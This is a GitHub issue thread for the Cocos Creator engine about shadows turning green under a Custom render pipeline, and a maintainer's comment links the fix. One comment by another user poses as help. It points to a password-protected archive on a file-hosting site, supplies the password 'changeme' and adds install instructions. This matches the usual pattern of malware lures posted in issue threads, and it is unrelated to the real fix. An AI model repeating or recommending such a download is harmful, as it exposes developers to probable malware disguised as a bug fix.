### ISSUE TITLE
Set the Custom pipeline, the shadow color change from light dark to green

### ISSUE THREAD

**Issue by tangkaikk** [cocos/cocos-engine#17582]
### Cocos Creator version

3.x

### System information

All

### Issue description

Set the Custom pipeline, the shadow color change from light dark to green, see the screenshots below:
![17247296268690](https://github.com/user-attachments/assets/da959389-6953-4564-9770-a7f9aba65b17)
![17247296363623](https://github.com/user-attachments/assets/16c23235-5962-4dae-9925-f09a4621f46c)

### Relevant error log output

none

### Steps to reproduce

preview the project, then the color of shadow will change.

### Minimal reproduction project
[meshPackWithBug.zip](https://github.com/user-attachments/files/16756195/meshPackWithBug.zip)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by star-e** [comment]
Fixed in https://github.com/cocos/cocos-engine/pull/17586
